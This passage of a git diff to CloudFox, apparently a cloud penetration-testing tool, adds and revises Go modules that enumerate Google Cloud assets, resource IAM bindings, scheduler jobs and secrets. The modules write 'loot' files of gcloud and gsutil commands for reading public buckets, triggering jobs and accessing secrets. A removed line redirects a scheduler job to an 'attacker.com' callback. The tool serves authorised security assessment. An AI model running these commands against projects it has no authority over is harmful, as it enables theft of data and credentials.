name.GetStringValue() - } - if displayName, ok := asset.Resource.Data.Fields["displayName"]; ok { - assetResource.DisplayName = displayName.GetStringValue() - } - - // Extract labels - if labels, ok := asset.Resource.Data.Fields["labels"]; ok { - if labels.GetStructValue() != nil { - assetResource.Labels = make(map[string]string) - for k, v := range labels.GetStructValue().Fields { - assetResource.Labels[k] = v.GetStringValue() - } - } - } - - // Extract network tags for compute instances - if tags, ok := asset.Resource.Data.Fields["tags"]; ok { - if tagsStruct := tags.GetStructValue(); tagsStruct != nil { - if items, ok := tagsStruct.Fields["items"]; ok { - for _, item := range items.GetListValue().Values { - assetResource.NetworkTags = append(assetResource.NetworkTags, item.GetStringValue()) - } - } - } - } - } - } - - // Parse update time - if asset.UpdateTime != nil { - assetResource.UpdateTime = asset.UpdateTime.AsTime().Format("2006-01-02 15:04:05") - } - - return assetResource -} - -func (m *ResourceGraphModule) analyzeAssetDependencies(asset *assetpb.Asset, projectID string) { - if asset.Resource == nil || asset.Resource.Data == nil { - return - } - - // Common dependency patterns - dependencyFields := map[string]string{ - "network": "uses", - "subnetwork": "uses", - "serviceAccount": "uses", - "disk": "uses", - "snapshot": "references", - "image": "references", - "keyRing": "uses", - "cryptoKey": "uses", - "topic": "references", - "subscription": "references", - "bucket": "uses", - "dataset": "references", - "cluster": "contains", - } - - for field, depType := range dependencyFields { - if value, ok := asset.Resource.Data.Fields[field]; ok { - targetResource := value.GetStringValue() - if targetResource != "" { - dependency := ResourceDependency{ - SourceResource: asset.Name, - SourceType: asset.AssetType, - TargetResource: targetResource, - TargetType: m.inferResourceType(field), - DependencyType: depType, - ProjectID: projectID, - } - - m.mu.Lock() - m.Dependencies = append(m.Dependencies, dependency) - m.mu.Unlock() - } - } - } -} - -func (m *ResourceGraphModule) inferResourceType(fieldName string) string { - typeMap := map[string]string{ - "network": "compute.googleapis.com/Network", - "subnetwork": "compute.googleapis.com/Subnetwork", - "serviceAccount": "iam.googleapis.com/ServiceAccount", - "disk": "compute.googleapis.com/Disk", - "snapshot": "compute.googleapis.com/Snapshot", - "image": "compute.googleapis.com/Image", - "keyRing": "cloudkms.googleapis.com/KeyRing", - "cryptoKey": "cloudkms.googleapis.com/CryptoKey", - "topic": "pubsub.googleapis.com/Topic", - "subscription": "pubsub.googleapis.com/Subscription", - "bucket": "storage.googleapis.com/Bucket", - "dataset": "bigquery.googleapis.com/Dataset", - "cluster": "container.googleapis.com/Cluster", - } - - if assetType, ok := typeMap[fieldName]; ok { - return assetType - } - return "unknown" -} - -func (m *ResourceGraphModule) analyzeCrossProjectResources(logger internal.Logger) { - m.mu.Lock() - defer m.mu.Unlock() - - // Group dependencies by target resource - targetToSources := make(map[string][]string) // target -> source projects - targetToType := make(map[string]string) - - for _, dep := range m.Dependencies { - // Check if target is in a different project - targetProject := m.extractProjectFromResource(dep.TargetResource) - if targetProject != "" && targetProject != dep.ProjectID { - targetToSources[dep.TargetResource] = append(targetToSources[dep.TargetResource], dep.ProjectID) - targetToType[dep.TargetResource] = dep.TargetType - } - } - - // Create cross-project records - for target, sources := range targetToSources { - crossProject := CrossProjectResource{ - ResourceName: target, - ResourceType: targetToType[target], - OwnerProject: m.extractProjectFromResource(target), - AccessedFrom: sources, - AccessType: "dependency", - RiskLevel: "LOW", - } - - // Higher risk if accessed from many projects - if len(sources) > 2 { - crossProject.RiskLevel = "MEDIUM" - } - - m.CrossProject = append(m.CrossProject, crossProject) - } -} - -func (m *ResourceGraphModule) extractProjectFromResource(resource string) string { - // Format: //service.googleapis.com/projects/{project}/... - // or: projects/{project}/... - if strings.Contains(resource, "projects/") { - parts := strings.Split(resource, "/") - for i, part := range parts { - if part == "projects" && i+1 < len(parts) { - return parts[i+1] - } - } - } - return "" -} - -func (m *ResourceGraphModule) generateQueryTemplates() { - m.mu.Lock() - defer m.mu.Unlock() - - // Generate useful query templates for Cloud Asset Inventory - templates := []struct { - Name string - Description string - Query string - }{ - { - Name: "Public Storage Buckets", - Description: "Find all public GCS buckets", - Query: `resource.type="storage.googleapis.com/Bucket" AND resource.data.iamConfiguration.uniformBucketLevelAccess.enabled=false`, - }, - { - Name: "VMs with External IPs", - Description: "Find compute instances with external IP addresses", - Query: `resource.type="compute.googleapis.com/Instance" AND resource.data.networkInterfaces.accessConfigs:*`, - }, - { - Name: "Service Account Keys", - Description: "Find all user-managed service account keys", - Query: `resource.type="iam.googleapis.com/ServiceAccountKey" AND resource.data.keyType="USER_MANAGED"`, - }, - { - Name: "Firewall Rules - Open to Internet", - Description: "Find firewall rules allowing 0.0.0.0/0", - Query: `resource.type="compute.googleapis.com/Firewall" AND resource.data.sourceRanges:"0.0.0.0/0"`, - }, - { - Name: "Cloud SQL - Public IPs", - Description: "Find Cloud SQL instances with public IP", - Query: `resource.type="sqladmin.googleapis.com/Instance" AND resource.data.settings.ipConfiguration.ipv4Enabled=true`, - }, - { - Name: "Unencrypted Disks", - Description: "Find disks without customer-managed encryption", - Query: `resource.type="compute.googleapis.com/Disk" AND NOT resource.data.diskEncryptionKey:*`, - }, - { - Name: "GKE Clusters - Legacy Auth", - Description: "Find GKE clusters with legacy authentication", - Query: `resource.type="container.googleapis.com/Cluster" AND resource.data.legacyAbac.enabled=true`, - }, - { - Name: "Resources Without Labels", - Description: "Find resources missing required labels", - Query: `NOT labels:* AND (resource.type="compute.googleapis.com/Instance" OR resource.type="storage.googleapis.com/Bucket")`, - }, - } - - for _, t := range templates { - m.LootMap["query-templates"].Contents += fmt.Sprintf( - "## %s\n"+ - "# %s\n"+ - "# Query:\n"+ - "gcloud asset search-all-resources \\\n"+ - " --scope=projects/PROJECT_ID \\\n"+ - " --query='%s'\n\n", - t.Name, t.Description, t.Query, - ) - } - - // Add asset inventory export commands - m.LootMap["asset-inventory-commands"].Contents += "# Export complete asset inventory\n" - for _, projectID := range m.ProjectIDs { - m.LootMap["asset-inventory-commands"].Contents += fmt.Sprintf( - "gcloud asset export \\\n"+ - " --project=%s \\\n"+ - " --content-type=resource \\\n"+ - " --output-path=gs://BUCKET_NAME/%s-assets.json\n\n", - projectID, projectID, - ) - } - - // Add search commands - m.LootMap["asset-inventory-commands"].Contents += "\n# Search for specific resource types\n" - m.LootMap["asset-inventory-commands"].Contents += "gcloud asset search-all-resources --scope=projects/PROJECT_ID --asset-types=compute.googleapis.com/Instance\n" - m.LootMap["asset-inventory-commands"].Contents += "gcloud asset search-all-resources --scope=projects/PROJECT_ID --asset-types=storage.googleapis.com/Bucket\n" - m.LootMap["asset-inventory-commands"].Contents += "gcloud asset search-all-resources --scope=projects/PROJECT_ID --asset-types=iam.googleapis.com/ServiceAccount\n" -} - -// ------------------------------ -// Loot File Management -// ------------------------------ -func (m *ResourceGraphModule) initializeLootFiles() { - m.LootMap["query-templates"] = &internal.LootFile{ - Name: "query-templates", - Contents: "# Cloud Asset Inventory Query Templates\n# Generated by CloudFox\n# Use these queries to search for security-relevant resources\n\n", - } - m.LootMap["asset-inventory-commands"] = &internal.LootFile{ - Name: "asset-inventory-commands", - Contents: "# Cloud Asset Inventory Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["resource-dependencies"] = &internal.LootFile{ - Name: "resource-dependencies", - Contents: "# Resource Dependencies\n# Generated by CloudFox\n\n", - } -} - -// ------------------------------ -// Output Generation -// ------------------------------ -func (m *ResourceGraphModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Create type summary sorted by count - var summaryList []*ResourceTypeSummary - for _, summary := range m.TypeSummary { - summaryList = append(summaryList, summary) - } - sort.Slice(summaryList, func(i, j int) bool { - return summaryList[i].Count > summaryList[j].Count - }) - - // Type Summary table - summaryHeader := []string{ - "Asset Type", - "Count", - "Projects", - } - - var summaryBody [][]string - for _, s := range summaryList { - summaryBody = append(summaryBody, []string{ - truncateString(s.AssetType, 50), - fmt.Sprintf("%d", s.Count), - fmt.Sprintf("%d", len(s.ProjectIDs)), - }) - } - - // Assets table (limited to most recent) - assetsHeader := []string{ - "Name", - "Type", - "Project Name", - "Project ID", - "Location", - "Updated", - } - - // Sort by update time - sort.Slice(m.Assets, func(i, j int) bool { - return m.Assets[i].UpdateTime > m.Assets[j].UpdateTime - }) - - var assetsBody [][]string - maxAssets := 100 // Limit output size - for i, a := range m.Assets { - if i >= maxAssets { - break - } - name := a.DisplayName - if name == "" { - name = m.extractResourceName(a.Name) - } - assetsBody = append(assetsBody, []string{ - truncateString(name, 40), - truncateString(a.AssetType, 40), - m.GetProjectName(a.ProjectID), - a.ProjectID, - a.Location, - truncateString(a.UpdateTime, 20), - }) - } - - // Dependencies table - depsHeader := []string{ - "Source", - "Dependency Type", - "Target", - "Target Type", - } - - var depsBody [][]string - for _, d := range m.Dependencies { - depsBody = append(depsBody, []string{ - truncateString(m.extractResourceName(d.SourceResource), 35), - d.DependencyType, - truncateString(m.extractResourceName(d.TargetResource), 35), - truncateString(d.TargetType, 30), - }) - - // Add to loot - m.LootMap["resource-dependencies"].Contents += fmt.Sprintf( - "%s -> %s (%s)\n", - m.extractResourceName(d.SourceResource), - m.extractResourceName(d.TargetResource), - d.DependencyType, - ) - } - - // Cross-project resources table - crossHeader := []string{ - "Resource", - "Type", - "Owner Project Name", - "Owner Project ID", - "Accessed From", - "Risk", - } - - var crossBody [][]string - for _, c := range m.CrossProject { - crossBody = append(crossBody, []string{ - truncateString(m.extractResourceName(c.ResourceName), 35), - truncateString(c.ResourceType, 30), - m.GetProjectName(c.OwnerProject), - c.OwnerProject, - strings.Join(c.AccessedFrom, ","), - c.RiskLevel, - }) - } - - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - - // Build tables - tables := []internal.TableFile{ - { - Name: "asset-type-summary", - Header: summaryHeader, - Body: summaryBody, - }, - } - - if len(assetsBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "assets", - Header: assetsHeader, - Body: assetsBody, - }) - } - - if len(depsBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "resource-dependencies", - Header: depsHeader, - Body: depsBody, - }) - } - - if len(crossBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "cross-project-resources", - Header: crossHeader, - Body: crossBody, - }) - } - - output := ResourceGraphOutput{ - Table: tables, - Loot: lootFiles, - } - - // Build scope names using project names - scopeNames := make([]string, len(m.ProjectIDs)) - for i, projectID := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(projectID) - } - - // Write output - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - scopeNames, - m.ProjectIDs, - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_RESOURCEGRAPH_MODULE_NAME) - m.CommandCounter.Error++ - } -} - -func (m *ResourceGraphModule) extractResourceName(resource string) string { - parts := strings.Split(resource, "/") - if len(parts) > 0 { - return parts[len(parts)-1] - } - return resource -} diff --git a/gcp/commands/resourceiam.go b/gcp/commands/resourceiam.go new file mode 100644 index 00000000..ff659376 --- /dev/null +++ b/gcp/commands/resourceiam.go @@ -0,0 +1,343 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + resourceiamservice "github.com/BishopFox/cloudfox/gcp/services/resourceIAMService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPResourceIAMCommand = &cobra.Command{ + Use: globals.GCP_RESOURCEIAM_MODULE_NAME, + Aliases: []string{"resiam", "resource-policies"}, + Short: "Enumerate IAM policies on GCP resources (buckets, datasets, secrets, etc.)", + Long: `Enumerate IAM policies attached directly to GCP resources. + +This module discovers WHO has access to WHAT resources by enumerating +resource-level IAM policies (not just project-level policies). + +Supported Resource Types: +- Cloud Storage buckets +- BigQuery datasets +- Pub/Sub topics and subscriptions +- Secret Manager secrets +- Cloud KMS keys +- Cloud Functions +- Cloud Run services + +Key Findings: +- Public access (allUsers/allAuthenticatedUsers) +- Cross-project access patterns +- Overly permissive roles on sensitive resources +- Federated identity access to resources`, + Run: runGCPResourceIAMCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type ResourceIAMModule struct { + gcpinternal.BaseGCPModule + + Bindings []resourceiamservice.ResourceIAMBinding + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type ResourceIAMOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ResourceIAMOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ResourceIAMOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPResourceIAMCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_RESOURCEIAM_MODULE_NAME) + if err != nil { + return + } + + module := &ResourceIAMModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Bindings: []resourceiamservice.ResourceIAMBinding{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ResourceIAMModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating resource-level IAM policies...", globals.GCP_RESOURCEIAM_MODULE_NAME) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_RESOURCEIAM_MODULE_NAME, m.processProject) + + if len(m.Bindings) == 0 { + logger.InfoM("No resource IAM bindings found", globals.GCP_RESOURCEIAM_MODULE_NAME) + return + } + + // Count statistics + publicCount := 0 + resourceTypes := make(map[string]int) + for _, b := range m.Bindings { + resourceTypes[b.ResourceType]++ + if b.IsPublic { + publicCount++ + } + } + + // Build summary + var typeSummary []string + for rt, count := range resourceTypes { + typeSummary = append(typeSummary, fmt.Sprintf("%d %s(s)", count, rt)) + } + + logger.SuccessM(fmt.Sprintf("Found %d resource IAM binding(s): %s", + len(m.Bindings), strings.Join(typeSummary, ", ")), globals.GCP_RESOURCEIAM_MODULE_NAME) + + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d PUBLIC resource binding(s)!", publicCount), globals.GCP_RESOURCEIAM_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *ResourceIAMModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating resource IAM in project: %s", projectID), globals.GCP_RESOURCEIAM_MODULE_NAME) + } + + svc := resourceiamservice.New() + bindings, err := svc.GetAllResourceIAM(ctx, projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_RESOURCEIAM_MODULE_NAME, + fmt.Sprintf("Could not enumerate resource IAM in project %s", projectID)) + return + } + + m.mu.Lock() + m.Bindings = append(m.Bindings, bindings...) + + // Generate loot for public resources + for _, b := range bindings { + if b.IsPublic { + m.addPublicResourceToLoot(b) + } + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d resource IAM binding(s) in project %s", len(bindings), projectID), globals.GCP_RESOURCEIAM_MODULE_NAME) + } +} + +// ------------------------------ +// Loot Management +// ------------------------------ +func (m *ResourceIAMModule) initializeLootFiles() { + m.LootMap["resource-iam-commands"] = &internal.LootFile{ + Name: "resource-iam-commands", + Contents: "# Resource IAM Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["public-resources"] = &internal.LootFile{ + Name: "public-resources", + Contents: "# Public Resources\n# Generated by CloudFox\n# These resources have allUsers or allAuthenticatedUsers access!\n\n", + } +} + +func (m *ResourceIAMModule) addPublicResourceToLoot(b resourceiamservice.ResourceIAMBinding) { + m.LootMap["public-resources"].Contents += fmt.Sprintf( + "# %s: %s\n# Member: %s, Role: %s\n", + b.ResourceType, b.ResourceName, b.Member, b.Role, + ) + + // Add exploitation commands based on resource type + switch b.ResourceType { + case "bucket": + m.LootMap["public-resources"].Contents += fmt.Sprintf( + "gsutil ls %s\ngsutil cat %s/*\n\n", + b.ResourceName, b.ResourceName, + ) + case "function": + m.LootMap["public-resources"].Contents += fmt.Sprintf( + "# Function may be publicly invokable\ngcloud functions describe %s --project=%s\n\n", + b.ResourceID, b.ProjectID, + ) + case "cloudrun": + m.LootMap["public-resources"].Contents += fmt.Sprintf( + "# Cloud Run service may be publicly accessible\ngcloud run services describe %s --project=%s\n\n", + b.ResourceID, b.ProjectID, + ) + } +} + +// resourceKey creates a unique key for a resource to group bindings +func resourceKey(b resourceiamservice.ResourceIAMBinding) string { + return fmt.Sprintf("%s|%s|%s", b.ProjectID, b.ResourceType, b.ResourceName) +} + +// shortenRole extracts a readable role name from the full role path +func shortenRole(role string) string { + // roles/storage.objectViewer -> objectViewer + // projects/xxx/roles/customRole -> customRole + if idx := strings.LastIndex(role, "/"); idx != -1 { + return role[idx+1:] + } + return role +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ResourceIAMModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project ID", + "Resource Type", + "Resource ID", + "Resource Name", + "Public", + "Access (memberType:member [role])", + "Condition", + } + + // Group bindings by resource + resourceBindings := make(map[string][]resourceiamservice.ResourceIAMBinding) + resourceOrder := []string{} // Maintain order + for _, b := range m.Bindings { + key := resourceKey(b) + if _, exists := resourceBindings[key]; !exists { + resourceOrder = append(resourceOrder, key) + } + resourceBindings[key] = append(resourceBindings[key], b) + } + + var body [][]string + for _, key := range resourceOrder { + bindings := resourceBindings[key] + if len(bindings) == 0 { + continue + } + + // Use first binding for resource info + first := bindings[0] + + // Check if any binding is public + isPublic := "No" + for _, b := range bindings { + if b.IsPublic { + isPublic = "Yes" + break + } + } + + // Build access list: one line per entity "memberType:member [role]" + var accessList []string + var conditionList []string + for _, b := range bindings { + // Format: memberType:member [shortRole] + member := b.MemberEmail + if member == "" { + member = b.Member + } + memberType := strings.ToLower(b.MemberType) + role := shortenRole(b.Role) + + entry := fmt.Sprintf("%s:%s [%s]", memberType, member, role) + accessList = append(accessList, entry) + + // Collect condition expressions + if b.HasCondition && b.ConditionExpression != "" { + condEntry := b.ConditionExpression + if b.ConditionTitle != "" { + condEntry = fmt.Sprintf("%s: %s", b.ConditionTitle, b.ConditionExpression) + } + // Avoid duplicates + found := false + for _, existing := range conditionList { + if existing == condEntry { + found = true + break + } + } + if !found { + conditionList = append(conditionList, condEntry) + } + } + } + + condition := "-" + if len(conditionList) > 0 { + condition = strings.Join(conditionList, "\n") + } + + body = append(body, []string{ + first.ProjectID, + first.ResourceType, + first.ResourceID, + first.ResourceName, + isPublic, + strings.Join(accessList, "\n"), + condition, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") && + !strings.HasSuffix(loot.Contents, "# These resources have allUsers or allAuthenticatedUsers access!\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "resource-iam", + Header: header, + Body: body, + }, + } + + output := ResourceIAMOutput{ + Table: tables, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + []string{}, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_RESOURCEIAM_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/scheduler.go b/gcp/commands/scheduler.go index 3637fd8e..19bc1619 100644 --- a/gcp/commands/scheduler.go +++ b/gcp/commands/scheduler.go @@ -151,100 +151,51 @@ func (m *SchedulerModule) processProject(ctx context.Context, projectID string, // Loot File Management // ------------------------------ func (m *SchedulerModule) initializeLootFiles() { - m.LootMap["scheduler-gcloud-commands"] = &internal.LootFile{ - Name: "scheduler-gcloud-commands", - Contents: "# Cloud Scheduler gcloud Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["scheduler-http-targets"] = &internal.LootFile{ - Name: "scheduler-http-targets", - Contents: "# Cloud Scheduler HTTP Targets\n# Generated by CloudFox\n# These URLs are called by scheduled jobs\n\n", - } - m.LootMap["scheduler-service-accounts"] = &internal.LootFile{ - Name: "scheduler-service-accounts", - Contents: "# Cloud Scheduler Service Accounts\n# Generated by CloudFox\n# Service accounts used for job authentication\n\n", - } - m.LootMap["scheduler-exploitation"] = &internal.LootFile{ - Name: "scheduler-exploitation", - Contents: "# Cloud Scheduler Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + m.LootMap["scheduler-commands"] = &internal.LootFile{ + Name: "scheduler-commands", + Contents: "# Scheduler Commands\n" + + "# Generated by CloudFox\n" + + "# WARNING: Only use with proper authorization\n\n", } } func (m *SchedulerModule) addJobToLoot(job SchedulerService.JobInfo) { - // gcloud commands - m.LootMap["scheduler-gcloud-commands"].Contents += fmt.Sprintf( - "# Job: %s (Project: %s, Location: %s)\n"+ - "gcloud scheduler jobs describe %s --location=%s --project=%s\n"+ - "gcloud scheduler jobs run %s --location=%s --project=%s # Trigger immediately\n\n", - job.Name, job.ProjectID, job.Location, - job.Name, job.Location, job.ProjectID, - job.Name, job.Location, job.ProjectID, - ) - - // HTTP targets - if job.TargetType == "http" { - m.LootMap["scheduler-http-targets"].Contents += fmt.Sprintf( - "# Job: %s\n"+ - "# Schedule: %s (%s)\n"+ - "# Method: %s\n"+ - "# URL: %s\n"+ - "# Auth: %s\n", - job.Name, - job.Schedule, job.TimeZone, - job.TargetHTTPMethod, - job.TargetURI, - job.AuthType, - ) - if job.ServiceAccount != "" { - m.LootMap["scheduler-http-targets"].Contents += fmt.Sprintf( - "# Service Account: %s\n", - job.ServiceAccount, - ) - } - m.LootMap["scheduler-http-targets"].Contents += "\n" - } + target := formatTargetFull(job) - // Service accounts - if job.ServiceAccount != "" { - m.LootMap["scheduler-service-accounts"].Contents += fmt.Sprintf( - "# Job: %s -> %s %s\n"+ - "%s\n\n", - job.Name, job.TargetType, formatTarget(job), - job.ServiceAccount, - ) - } - - // Exploitation commands - m.LootMap["scheduler-exploitation"].Contents += fmt.Sprintf( - "# Job: %s (Project: %s)\n"+ + m.LootMap["scheduler-commands"].Contents += fmt.Sprintf( + "## Job: %s (Project: %s, Location: %s)\n"+ "# State: %s\n"+ "# Schedule: %s (%s)\n"+ "# Target: %s -> %s\n", - job.Name, job.ProjectID, + job.Name, job.ProjectID, job.Location, job.State, job.Schedule, job.TimeZone, - job.TargetType, formatTarget(job), + job.TargetType, target, ) if job.ServiceAccount != "" { - m.LootMap["scheduler-exploitation"].Contents += fmt.Sprintf( + m.LootMap["scheduler-commands"].Contents += fmt.Sprintf( "# Service Account: %s\n", job.ServiceAccount, ) } - m.LootMap["scheduler-exploitation"].Contents += fmt.Sprintf( - "\n# Run job immediately:\n"+ + m.LootMap["scheduler-commands"].Contents += fmt.Sprintf( + "\n# Describe job:\n"+ + "gcloud scheduler jobs describe %s --location=%s --project=%s\n\n"+ + "# Run job immediately:\n"+ "gcloud scheduler jobs run %s --location=%s --project=%s\n\n"+ "# Pause job:\n"+ "gcloud scheduler jobs pause %s --location=%s --project=%s\n\n", job.Name, job.Location, job.ProjectID, job.Name, job.Location, job.ProjectID, + job.Name, job.Location, job.ProjectID, ) if job.TargetType == "http" { - m.LootMap["scheduler-exploitation"].Contents += fmt.Sprintf( - "# Update job to call attacker endpoint (if you have cloudscheduler.jobs.update):\n"+ - "gcloud scheduler jobs update http %s --location=%s --project=%s --uri=\"https://attacker.com/callback\"\n\n", + m.LootMap["scheduler-commands"].Contents += fmt.Sprintf( + "# Update HTTP target (requires cloudscheduler.jobs.update):\n"+ + "gcloud scheduler jobs update http %s --location=%s --project=%s --uri=\"NEW_URL\"\n\n", job.Name, job.Location, job.ProjectID, ) } @@ -270,19 +221,19 @@ func (m *SchedulerModule) writeOutput(ctx context.Context, logger internal.Logge var body [][]string for _, job := range m.Jobs { - // Format target - target := formatTarget(job) + // Format target - full, no truncation + target := formatTargetFull(job) - // Format service account + // Format service account - full, no truncation sa := "-" if job.ServiceAccount != "" { - sa = truncateSAScheduler(job.ServiceAccount) + sa = job.ServiceAccount } // Format last run lastRun := "-" if job.LastAttemptTime != "" { - lastRun = formatTime(job.LastAttemptTime) + lastRun = job.LastAttemptTime if job.Status != "" && job.Status != "OK" { lastRun += " (FAILED)" } @@ -302,10 +253,10 @@ func (m *SchedulerModule) writeOutput(ctx context.Context, logger internal.Logge }) } - // Collect loot files + // Collect loot files - only include if they have content beyond the header var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -349,13 +300,10 @@ func (m *SchedulerModule) writeOutput(ctx context.Context, logger internal.Logge // Helper functions -// formatTarget formats the job target for display -func formatTarget(job SchedulerService.JobInfo) string { +// formatTargetFull formats the job target for display without truncation +func formatTargetFull(job SchedulerService.JobInfo) string { switch job.TargetType { case "http": - if len(job.TargetURI) > 50 { - return job.TargetURI[:47] + "..." - } return job.TargetURI case "pubsub": return job.TargetTopic @@ -367,33 +315,11 @@ func formatTarget(job SchedulerService.JobInfo) string { if job.TargetURI != "" { target += job.TargetURI } + if target == "" { + return "-" + } return target default: return "-" } } - -// truncateSAScheduler truncates service account for display -func truncateSAScheduler(sa string) string { - if len(sa) > 35 { - if idx := strings.Index(sa, "@"); idx > 0 { - name := sa[:idx] - if len(name) > 25 { - return name[:22] + "...@..." - } - return name + "@..." - } - return sa[:32] + "..." - } - return sa -} - -// formatTime formats a timestamp for display -func formatTime(timestamp string) string { - // Timestamp is in RFC3339 format - // Truncate to just date and time - if len(timestamp) > 19 { - return timestamp[:19] - } - return timestamp -} diff --git a/gcp/commands/secrets.go b/gcp/commands/secrets.go index 74955813..5fe5c4e5 100644 --- a/gcp/commands/secrets.go +++ b/gcp/commands/secrets.go @@ -151,45 +151,9 @@ func (m *SecretsModule) processProject(ctx context.Context, projectID string, lo // Loot File Management // ------------------------------ func (m *SecretsModule) initializeLootFiles() { - m.LootMap["secrets-gcloud-commands"] = &internal.LootFile{ - Name: "secrets-gcloud-commands", - Contents: "# GCP Secret Manager Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["secrets-access-commands"] = &internal.LootFile{ - Name: "secrets-access-commands", - Contents: "# GCP Secret Access Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["secrets-exploitation"] = &internal.LootFile{ - Name: "secrets-exploitation", - Contents: "# GCP Secret Extraction Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["secrets-iam-bindings"] = &internal.LootFile{ - Name: "secrets-iam-bindings", - Contents: "# GCP Secret IAM Bindings\n# Generated by CloudFox\n\n", - } - m.LootMap["secrets-no-rotation"] = &internal.LootFile{ - Name: "secrets-no-rotation", - Contents: "# Secrets WITHOUT Rotation\n# Generated by CloudFox\n# These secrets may contain stale credentials\n\n", - } - m.LootMap["secrets-with-rotation"] = &internal.LootFile{ - Name: "secrets-with-rotation", - Contents: "# Secrets WITH Rotation Configured\n# Generated by CloudFox\n\n", - } - m.LootMap["secrets-google-managed"] = &internal.LootFile{ - Name: "secrets-google-managed", - Contents: "# Secrets Using Google-Managed Encryption\n# Generated by CloudFox\n# Consider CMEK for compliance requirements\n\n", - } - m.LootMap["secrets-cmek"] = &internal.LootFile{ - Name: "secrets-cmek", - Contents: "# Secrets Using CMEK (Customer-Managed Encryption Keys)\n# Generated by CloudFox\n\n", - } - m.LootMap["secrets-security-recommendations"] = &internal.LootFile{ - Name: "secrets-security-recommendations", - Contents: "# Secret Manager Security Recommendations\n# Generated by CloudFox\n# Remediation commands for security issues\n\n", - } - m.LootMap["secrets-public-access"] = &internal.LootFile{ - Name: "secrets-public-access", - Contents: "# Secrets with PUBLIC Access\n# Generated by CloudFox\n# CRITICAL: These secrets are accessible by anyone!\n\n", + m.LootMap["secrets-commands"] = &internal.LootFile{ + Name: "secrets-commands", + Contents: "# GCP Secret Manager Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } @@ -197,201 +161,72 @@ func (m *SecretsModule) addSecretToLoot(secret SecretsService.SecretInfo) { // Extract secret name from full path secretName := getSecretShortName(secret.Name) - // gcloud commands for enumeration - m.LootMap["secrets-gcloud-commands"].Contents += fmt.Sprintf( - "# Secret: %s (Project: %s)\n"+ + m.LootMap["secrets-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# SECRET: %s (Project: %s)\n"+ + "# ==========================================\n"+ "# Encryption: %s, Replication: %s, Rotation: %s\n"+ - "gcloud secrets describe %s --project=%s\n"+ - "gcloud secrets versions list %s --project=%s\n"+ - "gcloud secrets get-iam-policy %s --project=%s\n\n", + "# Created: %s\n", secretName, secret.ProjectID, secret.EncryptionType, secret.ReplicationType, secret.Rotation, - secretName, secret.ProjectID, - secretName, secret.ProjectID, - secretName, secret.ProjectID, + secret.CreationTime, ) - // Secret access commands - m.LootMap["secrets-access-commands"].Contents += fmt.Sprintf( - "# Secret: %s\n"+ - "# Access latest version:\n"+ - "gcloud secrets 